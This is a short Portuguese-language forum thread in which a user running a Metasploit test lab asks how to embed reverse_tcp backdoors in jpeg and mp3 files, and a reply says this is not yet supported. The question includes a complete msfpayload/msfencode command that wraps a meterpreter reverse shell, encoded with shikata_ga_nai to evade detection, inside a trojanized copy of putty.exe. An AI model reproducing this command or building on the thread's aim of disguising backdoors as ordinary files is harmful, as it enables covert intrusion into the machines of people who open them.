[msfencode]Encode ou comando para iserir codigo reverse_tcp em jpeg, mp3, pdf
Olá pessoal, estou com um ambiente de testes para metasploit tenho efetuado testes de invasão, até o ultimo teste tudo bem, agora estou tentando descobrir uma maneira de utilizando o msfencode junto com o msfpayload, carregar codigo de backdoors em arquivos jpeg e mp3 coisas do tipo, tenho procurado bastante mas naum encontrei documentação clara sobre o assunto alguns videos sobre como explorar a vulns do filetype PDF mais nada sobre o mp3 ou jpeg... pensei em algo parecido com o que tenho usado pra arquivos .exe
Uso este para gerar o .exe:
msfpayload windows/meterpreter/reverse_tcp LHOST=172.XX.XXX.2 R | msfencode -t exe -x /home/exploits/putty.exe -k -o /home/exploits/putty-pro.exe -e x86/shikata_ga_nai -c 5
Será que naum haveria algo para gerar jpeg, ou mp3?
Re: [msfencode]Encode ou comando para iserir codigo reverse_tcp em jpeg, mp3, pdf
Por enquanto não há suporte para as extensões mp3 e jpeg. Mais a equipe do metasploit já está desenvolvendo técnicas sobre o mesmo para adicionar ao msf. Eles estão se baseando em um artigo que foi publicado na revista Hakin9 no começo do ano passado que se chama "Attacks on Music and Video files". Recomendo baixá-la e dar uma estudada.
Att,
Re: [msfencode]Encode ou comando para iserir codigo reverse_tcp em jpeg, mp3, pdf